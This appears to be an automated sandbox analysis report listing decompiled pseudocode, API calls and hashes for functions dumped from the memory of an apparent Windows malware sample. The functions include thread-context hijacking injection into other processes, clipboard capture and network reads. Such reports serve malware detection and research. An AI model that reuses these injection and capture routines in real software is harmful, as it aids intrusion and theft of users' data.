API String ID: 2134968610-0
Opcode ID: 94f40f8618690de0add3e4b5c76fd643e087b0d27408a829447f9a2fc798835f
Instruction ID: 8f5face52e785cb9bb826bf73ab75f92cb845b6964bcda7d605ac633ab714712
Opcode Fuzzy Hash: 94f40f8618690de0add3e4b5c76fd643e087b0d27408a829447f9a2fc798835f
Instruction Fuzzy Hash: E051C432904305ABD710EB61CC41FEB7BE8EF84744F10093EBA84E71A1DB78D9458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041202B, Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041202B(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E004114F6(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E004114A6( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E004114A6( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E004114A6( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

0x0041202b
0x0041202b
0x0041202b
0x00412033
0x00412048
0x0041204c
0x00412052
0x00412057
0x0041205e
0x00412067
0x0041206a
0x00412070
0x00412097
0x00412099
0x0041209f
0x00412072
0x00412074
0x0041213c
0x0041213c
0x00412140
0x00412140
0x00412140
0x00412149
0x0041214d
0x0041207a
0x00412087
0x0041208a
0x00412095
0x004120a9
0x004120a9
0x004120ac
0x00000000
0x00000000
0x004120b2
0x004120b6
0x00412116
0x0041211f
0x00412124
0x00412126
0x00000000
0x0041212c
0x0041212e
0x00412134
0x00412136
0x00000000
0x00000000
0x00000000
0x00000000
0x00412136
0x004120b8
0x004120bb
0x004120c7
0x004120ca
0x004120cd
0x004120cf
0x004120d2
0x004120d5
0x00412114
0x00412114
0x00412114
0x00000000
0x004120d7
0x004120d7
0x004120de
0x004120de
0x004120e3
0x00000000
0x004120e5
0x004120eb
0x004120f0
0x004120f2
0x00000000
0x004120f4
0x00412102
0x00412105
0x00412108
0x0041210e
0x00412110
0x004120a7
0x004120a7
0x00000000
0x00412112
0x00000000
0x00412112
0x00412110
0x004120f2
0x004120d9
0x004120d9
0x004120dc
0x00000000
0x00000000
0x00000000
0x00000000
0x004120dc
0x004120d7
0x004120d5
0x00000000
0x004120b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00412095
0x00412074
0x00412070
0x00412152
0x00412158

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 0041204C

Part of subcall function 004114F6: GetFileSizeEx.KERNEL32(c A,c A,?,?,?,00412063,00000000), ref: 00411502

ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0041208D
CloseHandle.KERNEL32(?,00000000), ref: 00412099
ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 00412108
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0041212E

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Read$CloseCreateHandleSize
String ID:
API String ID: 1850650832-0
Opcode ID: 77950c4bc29ec8f84c2973dfb2ac86323fda6b6cc1a1236fca3ab5bec0d0ee6e
Instruction ID: 911bdecabc8eb4d655840cbd287b731f2f3cec379d60fa67e3a49ff590caebe3
Opcode Fuzzy Hash: 77950c4bc29ec8f84c2973dfb2ac86323fda6b6cc1a1236fca3ab5bec0d0ee6e
Instruction Fuzzy Hash: 6F41C371800205AEDF248F65CD45FEFBFB5EF88710F10422AE695E22A0D3754591CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00412760, Relevance: 7.6, APIs: 5, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00412760(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
				int _v8;
				void* _t37;
				long _t38;
				struct HBITMAP__* _t46;
				void* _t47;
				signed int _t56;
				signed int _t57;
				BITMAPINFO** _t62;
				BITMAPINFO* _t64;

				_t57 = __edx;
				_v8 = 0;
				_t64 = E0040C192(0x428);
				if(_t64 == 0) {
					L14:
					if(_a24 != 0) {
						DeleteObject(_a24);
					}
					L16:
					return _v8;
				}
				_t64->bmiHeader = 0x28;
				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
					L13:
					E0040C1C2(_t64);
					goto L14;
				} else {
					DeleteObject(_a24);
					asm("cdq");
					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_a24 = 0;
					_t64->bmiHeader.biHeight = _t56;
					if(_t37 == 0) {
						L7:
						_t64->bmiHeader.biClrUsed = 0;
						_push(8);
						_t64->bmiHeader.biClrImportant = 0;
						L8:
						_pop(_t38);
						_t64->bmiHeader.biBitCount = _t38;
						L9:
						_t62 = _a8;
						asm("cdq");
						_t58 = _t57 & 0x00000007;
						asm("cdq");
						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
						_t64->bmiHeader.biCompression = 0;
						if(_t62 != 0) {
							 *_t62 = _t64;
						}
						_t46 = CreateDIBSection(_a4, _t64, 0, _a12, _a16, _a20);
						_v8 = _t46;
						if(_t46 == 0 || _t62 == 0) {
							goto L13;
						} else {
							goto L16;
						}
					}
					_t47 = _t37 - 3;
					if(_t47 == 0) {
						goto L7;
					}
					if(_t47 != 0x14) {
						goto L9;
					}
					_push(0x20);
					goto L8;
				}
			}

0x00412760
0x0041276e
0x00412776
0x0041277a
0x00412842
0x00412845
0x0041284a
0x0041284a
0x00412850
0x00412857
0x00412857
0x0041278f
0x0041279c
0x0041283c
0x0041283d
0x00000000
0x004127b8
0x004127bb
0x004127c4
0x004127cf
0x004127d1
0x004127d2
0x004127d5
0x004127d8
0x004127e8
0x004127e8
0x004127eb
0x004127ed
0x004127f0
0x004127f0
0x004127f1
0x004127f5
0x004127fd
0x00412803
0x00412804
0x0041280c
0x00412811
0x00412814
0x00412819
0x0041281b
0x0041281b
0x0041282b
0x00412831
0x00412836
0x00000000
0x00000000
0x00000000
0x00000000
0x00412836
0x004127da
0x004127dd
0x00000000
0x00000000
0x004127e2
0x00000000
0x00000000
0x004127e4
0x00000000
0x004127e4

APIs

GetDIBits.GDI32(00000000,004168B2,00000000,00000001,00000000,00000000,00000000), ref: 00412798
GetDIBits.GDI32(00000000,004168B2,00000000,00000001,00000000,00000000,00000000), ref: 004127AE
DeleteObject.GDI32(004168B2), ref: 004127BB
CreateDIBSection.GDI32(00000000,00000000,00000000,00423EA0,?,?), ref: 0041282B
DeleteObject.GDI32(004168B2), ref: 0041284A

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: BitsDeleteObject$CreateSection
String ID:
API String ID: 1423349713-0
Opcode ID: d75f62a9b9486437bb53397700a31354b04aa2d311a0183dd9bca4e8e88a4d72
Instruction ID: 8ee4fb1876aa67620ec481b9724aa78964df894d07c8f89635a2307c3a323366
Opcode Fuzzy Hash: d75f62a9b9486437bb53397700a31354b04aa2d311a0183dd9bca4e8e88a4d72
Instruction Fuzzy Hash: DE31B37210020AAFDF209F25CE849AB7BE9EF08344B04853FF555D66A0C379DDA1DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041C949, Relevance: 7.6, APIs: 5, Instructions: 94
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041C949(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				char _t31;
				intOrPtr _t32;
				char* _t37;
				intOrPtr _t44;
				intOrPtr* _t58;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;

				_t63 = __edi;
				ResetEvent(_a8);
				_t31 = E0040C192(0x1000);
				_t65 = 0;
				_v52 = _t31;
				if(_t31 != 0) {
					_t58 = __imp__InternetSetStatusCallbackW;
					_t32 =  *_t58(_a4, E0041C900);
					_t62 = 0x28;
					_v56 = _t32;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E0040C275( &_v52,  &_v52, 0, _t62);
					_v64 = _t62;
					_v44 = _v72;
					while(1) {
						L3:
						_t37 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
						if(_t37 == 0) {
							break;
						}
						if(_v44 != _t65) {
							_t67 = _a12;
							if(E0040C14D( *_t63 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E0040C1FE( *_t67 +  *_t63, _v76, _v44);
								 *_t63 =  *_t63 + _v56;
								_t65 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t58(_a4,  ~(_v72 + 1) & _v72);
						E0040C1C2(_v84);
						if(_v89 == 0) {
							E0040C1C2( *_a12);
						}
						_t44 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E0040F92F( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E0040C1C2(0);
					_t44 = 0;
				}
				L13:
				return _t44;
			}

0x0041c949
0x0041c957
0x0041c962
0x0041c967
0x0041c969
0x0041c96f
0x0041c97e
0x0041c98c
0x0041c990
0x0041c991
0x0041c999
0x0041c9a1
0x0041c9a3
0x0041c9a8
0x0041c9b1
0x0041c9b5
0x0041c9b9
0x0041c9b9
0x0041c9bc
0x0041c9c4
0x0041c9cc
0x0041c9d4
0x00000000
0x00000000
0x0041c9f2
0x0041c9fa
0x0041ca04
0x0041ca24
0x0041ca24
0x0041ca06
0x0041ca15
0x0041ca1e
0x0041ca20
0x00000000
0x0041ca20
0x0041ca04
0x0041ca29
0x0041ca30
0x0041ca3a
0x0041ca40
0x0041ca4a
0x0041ca51
0x0041ca51
0x0041ca56
0x00000000
0x0041ca56
0x0041c9e1
0x00000000
0x0041c9e3
0x0041c9e7
0x00000000
0x0041c9e7
0x00000000
0x0041c971
0x0041c972
0x0041c977
0x0041c977
0x0041ca5a
0x0041ca5f

APIs

ResetEvent.KERNEL32(?), ref: 0041C957
InternetSetStatusCallbackW.WININET(?,0041C900), ref: 0041C98C
InternetReadFileExA.WININET ref: 0041C9CC
GetLastError.KERNEL32 ref: 0041C9D6
InternetSetStatusCallbackW.WININET(?,?), ref: 0041CA3A

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
String ID:
API String ID: 4044253124-0
Opcode ID: c0198c1f3005f2c3877436ae2891c5ff60d4313e6355d768b0aafe461902cd30
Instruction ID: b544d496662d9d5908eca4773c12999c6d91e6d0025643c13c60dab549566d69
Opcode Fuzzy Hash: c0198c1f3005f2c3877436ae2891c5ff60d4313e6355d768b0aafe461902cd30
Instruction Fuzzy Hash: D3317A71154345EFCB11DFA5CCC1A9ABBE8FF48348F00492AF8849B2A1D738C954CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041450A, Relevance: 7.6, APIs: 5, Instructions: 83
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041450A(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				void** _t45;
				void* _t46;
				void* _t47;
				void** _t50;
				void* _t52;
				void* _t53;
				signed int _t55;

				_t47 = __edx;
				_t45 = _a4;
				_t32 =  *0x4238c4(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t32;
				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E004132A1() != 0 && GetProcessId( *_t45) != 0) {
					_t36 = E004130C4(_t46, _t47, _t35);
					_a44 = _t36;
					_t63 = _t36;
					if(_t36 != 0) {
						_push(_t52);
						_t37 = E004131B6(_t46,  *_t45, _t52, _t63, _t36, 0);
						_t50 = _a8;
						_t53 = _t37;
						_a32 = _t53;
						_t55 = _t53 -  *0x4238b4 + E00413934;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t50,  &_v720) == 0 || _v720.Eip !=  *0x4238cc) {
							L12:
							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
						} else {
							if(( *0x4238a0 & 0x00000010) != 0) {
								_t55 = _t55 ^ _v720.Eax;
							}
							_v720.Eax = _t55;
							_v720.ContextFlags = 0x10002;
							if(SetThreadContext( *_t50,  &_v720) == 0) {
								goto L12;
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

0x0041450a
0x00414517
0x00414536
0x0041453c
0x00414541
0x00414581
0x00414586
0x00414589
0x0041458b
0x00414591
0x00414598
0x0041459d
0x004145a0
0x004145a8
0x004145b4
0x004145ba
0x004145cc
0x0041460e
0x0041461a
0x004145dc
0x004145e3
0x004145e5
0x004145e5
0x004145f4
0x004145fa
0x0041460c
0x00000000
0x00000000
0x0041460c
0x00414623
0x0041462a
0x0041458b
0x00414630

APIs

Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9

GetProcessId.KERNEL32(?), ref: 00414572

Part of subcall function 004130C4: CreateMutexW.KERNEL32(004238D8,00000001,?,00423B18,0001FEE6,?,00000002,?,0001FEE6), ref: 00413115
Part of subcall function 004130C4: GetLastError.KERNEL32 ref: 00413121
Part of subcall function 004130C4: CloseHandle.KERNEL32(00000000), ref: 0041312F

GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004145C4
SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00414604
VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 0041461A
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00414623

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseContextHandleThread$CreateErrorFreeLastMutexObjectProcessSingleVirtualWait
String ID:
API String ID: 3998962940-0
Opcode ID: 9c68ff0d24089496ab817a76f47258a243e237c3731683d93551cbaeae0f5ed1
Instruction ID: 0e4b82f8d0a33d0294755a6130f5df4dcdb9f967057effe64250ffff9639e74d
Opcode Fuzzy Hash: 9c68ff0d24089496ab817a76f47258a243e237c3731683d93551cbaeae0f5ed1
Instruction Fuzzy Hash: 01318C31500219ABDF11AF64CD08FDA7BB9FF08709F0440A6FE08A6260C779D991CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADE8, Relevance: 7.6, APIs: 5, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADE8(struct HWND__* __ecx, intOrPtr* __edx) {
				struct tagRECT _v24;
				char _v28;
				struct HWND__* _v32;
				intOrPtr _v36;
				struct HWND__* _v40;
				void* __edi;
				intOrPtr _t29;
				signed int _t30;
				RECT* _t52;
				signed int _t54;
				intOrPtr* _t61;

				_t55 = __edx;
				_t61 = __edx;
				 *( *(__edx + 0x14)) = 0x3c;
				_v32 = __ecx;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
					L12:
					return 1;
				}
				_t29 =  *((intOrPtr*)(_t61 + 0x14));
				_t54 =  *(_t29 + 0x24);
				if((_t54 & 0x40000000) == 0) {
					_t52 =  *_t61 + 0x24;
				} else {
					_t52 = _t61 + 4;
				}
				if((_t54 & 0x10000000) == 0) {
					_t30 = 0;
					goto L9;
				} else {
					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
						L10:
						E0040AC77( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
						_v36 =  *_t61;
						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
						if(GetTopWindow(_v40) != 0) {
							E004108C8( &_v28, _t35);
						}
						goto L12;
					}
					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
						goto L12;
					}
					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
					L9:
					if(_t30 == 0) {
						goto L12;
					}
					goto L10;
				}
			}

0x0040ade8
0x0040adf3
0x0040adf9
0x0040ae02
0x0040ae0f
0x0040aeb3
0x0040aebb
0x0040aebb
0x0040ae15
0x0040ae18
0x0040ae21
0x0040ae2a
0x0040ae23
0x0040ae23
0x0040ae23
0x0040ae33
0x0040ae77
0x00000000
0x0040ae35
0x0040ae4e
0x0040ae7d
0x0040ae88
0x0040ae93
0x0040ae9a
0x0040aea6
0x0040aeae
0x0040aeae
0x00000000
0x0040aea6
0x0040ae5f
0x00000000
0x00000000
0x0040ae72
0x0040ae79
0x0040ae7b
0x00000000
0x00000000
0x00000000
0x0040ae7b

APIs

GetWindowInfo.USER32 ref: 0040AE07
IntersectRect.USER32 ref: 0040AE45
IsRectEmpty.USER32(?), ref: 0040AE57
IntersectRect.USER32 ref: 0040AE6E
GetTopWindow.USER32(?), ref: 0040AE9E

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectWindow$EmptyInfo
String ID:
API String ID: 1664082778-0
Opcode ID: 479e3d6dae9206087f9911a4863658b4be21d5f2b5b3a6925f5a7f13de804247
Instruction ID: 4dd2ee3d8118df447a4926d4b53b643ec2fc8d8e126e15e9dbae9defc1c05329
Opcode Fuzzy Hash: 479e3d6dae9206087f9911a4863658b4be21d5f2b5b3a6925f5a7f13de804247
Instruction Fuzzy Hash: 542183715443019BD720DF28EE85E97B7ECAF44714B04092AF892E7761D738E819CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 0041A9B2, Relevance: 7.6, APIs: 5, Instructions: 72
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A9B2(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				void* __esi;
				intOrPtr _t18;
				void* _t24;
				void* _t26;
				long _t28;
				long _t35;
				void* _t40;
				WCHAR* _t43;
				void* _t50;

				_t50 = __eflags;
				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = E0041317B(_t40, _t50, 0x19367402, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					E00413140(0xff220829,  &_v204, 0);
					_t43 =  &_v724;
					E0041349C(_t40, _t43, 1);
					PathQuoteSpacesW(_t43);
					_t41 = _t43;
					_v8 = E0040CD11(_t43);
					_t24 = E004132A1();
					__eflags = _t24;
					if(_t24 == 0) {
						L7:
						E0040F995(_v12);
						__eflags = 0;
						return 0;
					}
					_t26 = 3;
					E004128DB(_t26,  &_v104);
					_t28 = WaitForSingleObject( *0x423d64, 0xc8);
					__eflags = _t28 - 0x102;
					if(_t28 != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E00410441(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
						_t35 = WaitForSingleObject( *0x423d64, 0xc8);
						__eflags = _t35 - 0x102;
					} while (_t35 == 0x102);
					goto L6;
				}
				return _t18 + 1;
			}

0x0041a9b2
0x0041a9b2
0x0041a9c4
0x0041a9d1
0x0041a9d6
0x0041a9db
0x0041a9f2
0x0041a9f9
0x0041a9ff
0x0041aa07
0x0041aa0d
0x0041aa14
0x0041aa17
0x0041aa1c
0x0041aa1e
0x0041aa7d
0x0041aa80
0x0041aa85
0x00000000
0x0041aa87
0x0041aa27
0x0041aa28
0x0041aa3f
0x0041aa44
0x0041aa46
0x0041aa7b
0x00000000
0x0041aa7c
0x0041aa4f
0x0041aa52
0x0041aa69
0x0041aa75
0x0041aa77
0x0041aa77
0x00000000
0x0041aa52
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 0041A9BD
SetThreadPriority.KERNEL32(00000000), ref: 0041A9C4

Part of subcall function 0041317B: CreateMutexW.KERNEL32(004238D8,00000000,?,?,?,?,?), ref: 0041319C

PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 0041AA07
WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 0041AA3F
WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 0041AA75

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
String ID:
API String ID: 123286213-0
Opcode ID: 8d151d7aee7d6fc0b4e7c610b12f7e693353b351f8aeeb36cfd81d40d644ee5f
Instruction ID: 16fd023486fd08417de226b061a41c1921ca9c66d7831f2343ec0d544423425e
Opcode Fuzzy Hash: 8d151d7aee7d6fc0b4e7c610b12f7e693353b351f8aeeb36cfd81d40d644ee5f
Instruction Fuzzy Hash: 5121CF71A00208BEDB11EBA0DD85FDE77B8EB04348F10006AF501F71A0DA789E85CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A132, Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040A132(void* _a4) {
				signed int _t11;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t25;

				_t25 = _a4;
				_t23 = GetClipboardData(_t25);
				_a4 = _t23;
				if(E004132A1() == 0) {
					return _t23;
				}
				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
					L20:
					return _a4;
				} else {
					_t21 = GlobalLock(_t23);
					if(_t21 == 0) {
						L19:
						goto L20;
					}
					_t11 = _t25 - 1;
					if(_t11 == 0) {
						_push(_t21);
						_push(0);
						L12:
						_t24 = E0040C402(_t11 | 0xffffffff);
						L15:
						if(_t24 != 0) {
							EnterCriticalSection(0x422988);
							E00409E2F(0x4017b4);
							E00409E2F(_t24);
							LeaveCriticalSection(0x422988);
							if(_t24 != _t21) {
								E0040C1C2(_t24);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t11 = _t11 - 6;
					if(_t11 == 0) {
						_push(_t21);
						_push(1);
						goto L12;
					}
					if(_t11 != 6) {
						_t24 = _a4;
					} else {
						_t24 = _t21;
					}
					goto L15;
				}
			}

0x0040a136
0x0040a141
0x0040a143
0x0040a14d
0x00000000
0x0040a14f
0x0040a158
0x0040a1e0
0x00000000
0x0040a16d
0x0040a175
0x0040a179
0x0040a1df
0x00000000
0x0040a1df
0x0040a17d
0x0040a17e
0x0040a19d
0x0040a19e
0x0040a191
0x0040a199
0x0040a1a5
0x0040a1a7
0x0040a1af
0x0040a1ba
0x0040a1c0
0x0040a1c6
0x0040a1ce
0x0040a1d1
0x0040a1d1
0x0040a1ce
0x0040a1d9
0x00000000
0x0040a1d9
0x0040a180
0x0040a183
0x0040a18e
0x0040a18f
0x00000000
0x0040a18f
0x0040a188
0x0040a1a2
0x0040a18a
0x0040a18a
0x0040a18a
0x00000000
0x0040a188

APIs

GetClipboardData.USER32 ref: 0040A13B

Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9

GlobalLock.KERNEL32 ref: 0040A16F
EnterCriticalSection.KERNEL32(00422988,00000000,00000000), ref: 0040A1AF
LeaveCriticalSection.KERNEL32(00422988,00000000,004017B4), ref: 0040A1C6
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 0040A1D9

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
String ID:
API String ID: 1109978993-0
Opcode ID: ecea2c1f5fcb2cd77fad4ca2d91b1b3bcb4cb1b2d2ec46cd6ae97df3b89ec140
Instruction ID: 39ea2de1660822f20c066d45d7d0ad368492d655e2c30e7702541b7ced387c13
Opcode Fuzzy Hash: ecea2c1f5fcb2cd77fad4ca2d91b1b3bcb4cb1b2d2ec46cd6ae97df3b89ec140
Instruction Fuzzy Hash: F41127326003056BC6112B289D849AF36299B853A0F18013BF815BF3E0DB7C8D51469F

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6E7, Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON

Download Yara Rule

APIs

#23.WS2_32(?,00000002,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040F6F9
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0040F723
#111.WS2_32 ref: 0040F72A
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040F756

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

#3.WS2_32(?), ref: 0040F76A

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Ioctl$#111FreeHeap
String ID:
API String ID: 1077273850-0
Opcode ID: 1291b0fe42db3397460248890730b1a893bba9080fa6ed505c3b18366a6c3a38
Instruction ID: 112c2364d610c5f514a1bc7a0009d6aa755204f300ea960dfb3f6e1bdd216e64
Opcode Fuzzy Hash: 1291b0fe42db3397460248890730b1a893bba9080fa6ed505c3b18366a6c3a38
Instruction Fuzzy Hash: 76115EB1801128BFDB20AB65DD89CEF7E2CEF453A4F104235F405B61A0D7349E41DAA4

Uniqueness

Uniqueness Score: -1.00%

